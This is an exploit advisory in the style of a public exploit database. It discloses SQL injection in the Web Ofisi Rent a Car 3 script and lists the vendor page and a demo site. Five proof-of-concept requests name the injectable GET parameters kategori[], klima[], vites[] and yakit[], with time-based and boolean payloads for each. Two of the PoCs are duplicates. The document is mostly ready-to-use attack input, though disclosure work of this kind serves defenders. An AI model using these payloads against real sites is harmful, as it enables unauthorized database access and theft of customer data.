Exploit Title: Web Ofisi Rent a Car 3 - ‘klima’ SQL Injection

Date: 2019-07-19

Exploit Author: Ahmet Ümit BAYRAM

Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html

Demo Site: http://demobul.net/rentacarv3/

Version: v3

Tested on: Kali Linux

CVE: N/A

—– PoC 1: SQLi —–

Request: http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1 Vulnerable Parameter: kategori[] (GET) Payload: if(now()=sysdate(),sleep(0),0)

—– PoC 2: SQLi —–

Request: http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 Vulnerable Parameter: klima[] (GET) Payload: 1 AND 321=6 AND 695=695

—– PoC 3: SQLi —–

Request: http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 Vulnerable Parameter: vites[] (GET) Payload: 1 AND 321=6 AND 499=499

—– PoC 4: SQLi —–

Request: http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 Vulnerable Parameter: vites[] (GET) Payload: 1 AND 321=6 AND 499=499

—– PoC 5: SQLi —–

Request: http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 Vulnerable Parameter: yakit[] (GET) Payload: 1 AND 321=6 AND 602=602